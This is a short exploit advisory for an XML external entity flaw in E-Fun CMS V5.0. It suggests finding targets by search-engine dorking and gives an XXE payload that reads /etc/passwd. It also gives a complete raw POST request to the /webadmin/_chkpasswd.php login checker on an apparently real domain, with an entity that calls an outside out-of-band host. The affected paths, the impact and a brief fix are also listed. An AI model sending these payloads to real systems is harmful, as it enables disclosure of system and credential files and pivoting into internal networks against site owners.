====================================================================================================================================
| # Title     : E-Fun CMS V5.0 XML external entity injection Vulnerability                                                         |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            |
| # Vendor    : http://www.e-fun.com.tw/                                                                                           |
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Vulnerability description :

XML supports a facility known as "external entities", 
which instruct an XML processor to retrieve and perform 
an inline include of XML located at a particular URI. 
An external XML entity can be used to append or modify 
the document type declaration (DTD) associated with an 
XML document. An external XML entity can also be used 
to include XML within the content of an XML document. 

Now assume that the XML processor parses data originating 
from a source under attacker control. Most of the time 
the processor will not be validating, but it MAY include 
the replacement text thus initiating an unexpected file 
open operation, or HTTP transfer, or whatever system ids 
the XML processor knows how to access. 

below is a sample XML document that will use this functionality 
to include the contents of a local file (/etc/passwd)

target : http://127.0.0.1/landtopcomtw/webadmin/

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE indoushka [
  <!ENTITY indoushka SYSTEM "file:///etc/passwd">
]>
<xxx>&indoushka;</xxx>

POST /webadmin/_chkpasswd.php HTTP/1.1
Content-type: text/xml
Host: landtop.com.tw
Content-Length: 175
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dt5fqyt [
  <!ENTITY dt5fqytent SYSTEM "http://hityjSWv9cxlI.bxss.me/">
]>
<_chkpasswd.php>&dt5fqytent;</_chkpasswd.php>


[+] Affected items :

/webadmin/ 
/webadmin/_chkpasswd.php 
/webadmin/index.php 

[+] The impact of this vulnerability :

Attacks can include disclosing local files, 
which may contain sensitive data such as passwords 
or private user data, using file: schemes or relative 
paths in the system identifier. Since the attack occurs 
relative to the application processing the XML document, 
an attacker may use this trusted application to pivot 
to other internal systems, possibly disclosing 
other internal content via http(s) requests.

[+] How to fix this vulnerability :

If possible it's recommended to disable parsing of XML external entities.

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |
=======================================================================================================================================